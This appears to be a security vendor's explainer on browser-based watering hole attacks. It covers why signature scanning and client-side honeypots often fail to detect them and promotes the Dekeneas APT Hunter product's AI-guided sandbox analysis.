Browser attacks
also called "watering hole attacks" are currently the most insidious and stealth cyber attacks. Instead of sending the victim
an e-mail or social media message with a link, the attackers compromise a vulnerable legitimate website the victim regularly
visits, and implants code that eventually takes full control over victim's device, through vulnerabilities either in the
browser itself, or underlying technologies, such as Java or Flash. This behavior makes the attack very hard to spot and acknowledge
because, as opposed to the much more common spearphishing attacks, there is no direct link between the attack and user's behavior.
Browser attacks focus on traditional browsers, such as Chrome, Edge or Firefox, but they also target mobile devices, which makes
them even harder to identify. Most of the vulnerabilities used in watering hole attacks are either very new or unknown at the
time of the attack. After a successful attack, the attackers either implant a rootkit or use victim's device to mine for
cryptocurrency.
A browser attack usually implants an iframe element inside a legitimate website, which redirects the victim to an exploit kit
server, where the actual attack is performed.
The problem
The HTTP/S and HTML protocols have different implementations on different browsers, mainly because HTTP was standardized as a
protocol years later after browsers emerged, thus allowing browser engines to have their own implementation and interpretation
of these protocols.
Once with the introduction of Javascript, the web pages began to act dynamically, instead of serving static content. This means
that the final form of the website will only be interpreted by user's browser, after all Javascript is executed in user's browser
context. This also means that the security products should know exactly how user's browser interprets and executes the Javascript
in the webpage it loads.
Traditional antivirus products or intrusion detection sensors would use signature scanning to identify watering hole attacks,
looking for known code snippets that are involved in these attacks. But in the recent years, watering hole attacks evolved using
Javascript obfuscation to hide relevant code snippets, making it impossible for traditional security products to detect such
attacks.
To counter this behavior, traditional security products try to detect the signature of the actual exploit, or the aftermath of
the attack, such as the connection to the command and control server, but if the exploit is unknown or very new, there is no signature
for it, and if the command and control server doesn't look suspicious, for instance it's a DNS request, or a HTTPS connection,
the attack goes totally undetected.
So, the only solution seems to be client-side honeypots, which emulate browsers and access websites hoping to find watering
hole attacks. But this approach is very time consuming as modern websites can have hundreds or thousands of pages, and loading
each and every one of them in an instrumented environment takes some time. Also, the attackers developed a series of methods
to identify instrumented environments, ranging from delayed execution to detection of virtualized environments, which are
specific to client-side honeypots. On top of that, the attackers fingerprint the browser, and only attack certain browsers,
certain technologies or users from a certain geographical area or IP range.
If the client-side honeypot doesn't guess all of the
above, the attack never happens, so the security product fails to identify an offensive web page.
Do watering hole attacks actually happen?
These features of watering hole attacks made them the perfect candidate in penetrating highly secured networks from banks,
defense industry or government contractors, tech giants such as Facebook, Apple, Twitter, or Microsoft, but also, activist
groups, investigative journalists or political disidents all over the world.
Most of the times the victims realize they have been compromised after a very long period of time, sometimes even years,
sometimes never, and when they realize the attack happened, it's usually because of luck or coincidence.
Dekeneas APT Hunter
Dekeneas APT Hunter uses artificial intelligence to understand the contents of a web page before performing further
dynamic instrumentation, looking for certain features such as obfuscation, delayed execution, redirection or fingerprinting.
If an HTML element shows signs of suspicious behavior it gets instrumented in a series of sandboxes which emulate user behavior
according to the features identified. For instance, if the HTML element tries to identify certain browsers, then those browsers
get emulated.
Also, if the HTML element tries to identify if the user has a certain language, the emulated browser sets that
particular language.
This behavior greatly reduces the amount of time needed for analysis, as only suspicious HTML elements
get analyzed, but also, it greatly increases the chances of detection by creating the exact environment the suspicious HTML
element is looking for.
These unique features allowed Dekeneas APT Hunter to uncover a series of complex attacks carried by APT groups, but also
carried by cybercriminals, all of them using either very new or unknown exploitation vectors.
